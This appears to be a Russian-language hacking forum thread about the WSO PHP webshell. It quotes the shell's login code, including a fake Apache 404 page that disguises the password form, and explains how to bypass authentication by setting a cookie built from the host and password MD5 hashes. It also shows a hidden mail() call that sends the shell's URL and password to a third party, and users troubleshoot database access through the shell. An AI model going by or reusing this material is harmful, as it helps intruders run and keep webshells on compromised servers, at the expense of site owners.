Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!! Давайте посмотрим в сторону кода самого шела как происходит авторизация: PHP: $auth_pass = "63a9f0ea7bb98050796b649e85481845"; //пусть условно будет пароль root//..........if(!empty($auth_pass)) { //если присутствует пароль if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) // и пароль равен его хэшь сумме WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); // отправляем куку с параметром хэшь хоста и значением хэшь пароля if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin();} предположим что у нас HOST: localhost тогда нам для авторизации, при известном хэше, достаточно будет вставить куку: 421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb98050796b649e85481845
__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php PHP: if(array_key_exists('watching',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('[email protected]', 'root', $tmp); // Edit or delete!} Стучалку и вырезать можно!
PHP: . . .@session_start();@ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define('WSO_VERSION', '2.6');if(get_magic_quotes_gpc()) {function WSOstripslashes($array) {return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);}$_POST = WSOstripslashes($_POST);}function wsoLogin() {die("<h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><pre align=center><form method=post><input type=password name=pass></form></pre>");}if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;elsewsoLogin();if(strtolower(substr(PHP_OS,0,3)) == "win")$os = 'win';else$os = 'nix'; . . . А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.
PHP скомпайлили/стартовали без поддержки архивов / php-модули для архивов не установлены (php-zip) / или же нет прав на запись. Посмотрите phpinfo чего не хватает.
Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается http://prntscr.com/nr5nyc, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?
https://www.php.net/manual/ru/function.mysql-query.php Code: function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; }
